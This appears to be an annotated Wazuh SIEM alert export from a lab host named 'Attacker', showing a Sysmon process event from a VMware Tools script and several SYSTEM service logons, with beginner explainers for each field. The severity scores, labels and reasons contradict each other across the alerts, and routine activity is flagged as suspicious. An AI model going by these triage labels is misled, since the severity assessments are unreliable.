
data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Suspicious Windows cmd shell execution

🧠 What happened? Suspicious Windows cmd shell execution

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:32:02.664+0000 | 🧠 MITRE: ['Discovery', 'Execution'] – ['Account Discovery', 'Windows Command Shell'] [T1087] [T1059.003]

🚨 Severity: High

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:02.664+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Suspicious Windows cmd shell execution
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92032
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087', 'T1059.003']
List of ATT&CK IDs matched (e.g., T1059). If you see high‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery', 'Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery', 'Windows Command Shell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533922.313499
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:36:54.6551986Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  212047
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-17 16:36:54.622 ProcessGuid: {94294ddc-2e26-6801-dc07-000000000e00} ProcessId: 9800 Image: C:\Windows\System32\conhost.exe FileVersion: 10.0.26100.3624 (WinBuild.160101.0800) Description: Console Window Host Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: CONHOST.EXE CommandLine: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 CurrentDirectory: C:\WINDOWS User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=EDDF1F02AF16312858678F31843F1CAB05A6DF47D9BA15C0AA117F583E669D9D ParentProcessGuid: {94294ddc-2e25-6801-d807-000000000e00} ParentProcessId: 4044 ParentImage: C:\Windows\System32\cmd.exe ParentCommandLine: C:\WINDOWS\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"" ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-17 16:36:54.622
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-2e26-6801-dc07-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  9800
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\conhost.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3624 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Console Window Host
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  CONHOST.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\WINDOWS
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=EDDF1F02AF16312858678F31843F1CAB05A6DF47D9BA15C0AA117F583E669D9D
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-2e25-6801-d807-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  4044
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\cmd.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  C:\\WINDOWS\\system32\\cmd.exe /c \"\"C:\\Program Files\\VMware\\VMware Tools\\resume-vm-default.bat\"\"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:32:03.049+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:03.049+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see high‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  28
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533923.318979
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:46:17.3947487Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43643
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  9160
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:32:03.172+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:03.172+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see high‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  29
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533923.326315
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:46:31.0469437Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43645
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  9160
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:32:03.228+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:03.228+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  30
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533923.333651
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:46:35.7410981Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43647
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  9160
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
